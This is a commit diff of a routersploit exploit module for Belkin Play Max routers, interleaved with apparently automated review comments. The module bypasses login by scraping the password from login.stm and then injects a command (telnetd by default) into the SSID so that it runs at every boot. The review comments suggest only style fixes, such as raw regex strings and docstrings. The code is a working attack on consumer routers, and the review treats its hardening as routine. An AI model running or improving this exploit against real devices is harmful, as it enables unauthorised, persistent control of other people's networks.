Commit 485ceef5 by BigNerd95

Minor fixes

parent 91222529
......@@ -17,10 +17,10 @@ class Exploit(exploits.Exploit):
If the target is vulnerable, you can run a bash command at every boot.
"""
__info__ = {
'name': 'Belkin Persistent Remote Command Execution',
'name': 'Belkin Play Max Persistent RCE',
'description': 'Module exploits Belkin SSID injection vuln, allowing to execute arbitrary command at every boot',
'authors': [
'BigNerd95 (Lorenzo Santina)', # vulnerability discovery and routersploit module
'BigNerd95 (Lorenzo Santina) https://github.com/bignerd95', # vulnerability discovery and routersploit module
],
'references': [
'https://bignerd95.blogspot.it/2017/02/belkin-play-max-persistent-remote.html',
......@@ -35,26 +35,12 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
cmd = exploits.Option('telnetd', 'Command to execute')
def check_auth_bypass(self):
url = "{}:{}/login.stm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces
if len(val):
return True # target vulnerable
return False # target is not vulnerable
def auth_bypass(self):
url = "{}:{}/login.stm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return
return False
val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces
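Review bot: The new `return False` on the `response is None` branch of auth_bypass exits silently, whereas inject_command reports the identical condition with `print_error("Exploit failed. No response from target!")`; now that run() is gated on this return value, a target that does not answer produces no output at all. Printing the same message before `return False` keeps the two methods consistent, and the `if login is None: return False` branch in the next hunk has the same gap. The rest of auth_bypass continues outside this hunk.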
......@@ -64,20 +50,22 @@ class Exploit(exploits.Exploit):
login = http_request(method="POST", url=url, data=payload)
if login is None:
return
return False
error = re.search('loginpserr.stm', login.text)
if not error:
print_success("Exploit success, you are now logged in!")
return
return True
print_error("Exploit failed. Device seems to be not vulnerable.")
return False
def inject_command(self):
ssid_url = "{}:{}/wireless_id.stm".format(self.target, self.port)
response = http_request(method="GET", url=ssid_url)
if response is None:
print_error("Exploit failed. No response from target!")
return
srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";", response.text)
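Review bot: auth_bypass now returns a bool that run() depends on, but the hunk adds no docstring stating that contract; a one-liner at the signature (outside this hunk) such as `"""Attempt the login bypass; return True if the login succeeded, False otherwise."""` would make it explicit. As a point of style, `re.search('loginpserr.stm', login.text)` uses a regex for a fixed substring with an unescaped `.`; `if 'loginpserr.stm' not in login.text:` reads more directly and, as far as I can tell, preserves the intent. The `return` added after the "No response from target!" message in inject_command is consistent with the message, and inject_command continues beyond the hunk.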
......@@ -85,7 +73,7 @@ class Exploit(exploits.Exploit):
SSID = srcSSID.group(1)
else:
print_error("Exploit failed. Are you logged in?")
exit(1)
return
if len(SSID) + 2 + len(self.cmd) > 32:
newlen = 32 - len(self.cmd) - 2
......@@ -99,6 +87,7 @@ class Exploit(exploits.Exploit):
response = http_request(method="POST", url=url, data=payload)
if response is None:
print_error("Exploit failed. No response from target!")
return
err = re.search('countdown\(55\);', response.text)
......@@ -106,12 +95,22 @@ class Exploit(exploits.Exploit):
print_success("Exploit success, wait until router reboot.")
else:
print_error("Exploit failed. Device seems to be not vulnerable.")
exit(1)
def run(self):
self.auth_bypass()
self.inject_command()
if self.auth_bypass():
self.inject_command()
@mute
def check(self):
return self.check_auth_bypass()
url = "{}:{}/login.stm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces
if len(val):
return True # target is vulnerable
return False # target is not vulnerable
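Review bot: The pattern inlined into check() at `re.findall('password\s?=\s?"(.+?)"', ...)` is a non-raw string, so `\s` is an invalid escape sequence (a DeprecationWarning since Python 3.6 and a SyntaxWarning since 3.12); write it as `r'password\s?=\s?"(.+?)"'`. The same pattern already appears verbatim in auth_bypass (the hunk ending at the earlier `val = re.findall` line), so hoisting it to a single module-level `re.compile(r'...')` constant would remove the duplication, and the `'countdown\(55\);'` pattern in inject_command has the same escape problem. The closing `if len(val): return True` / `return False` pair collapses to `return bool(val)`. A short docstring such as `"""Return True when the login page matches the vulnerable-firmware pattern, False otherwise."""` would also document what check() actually tests.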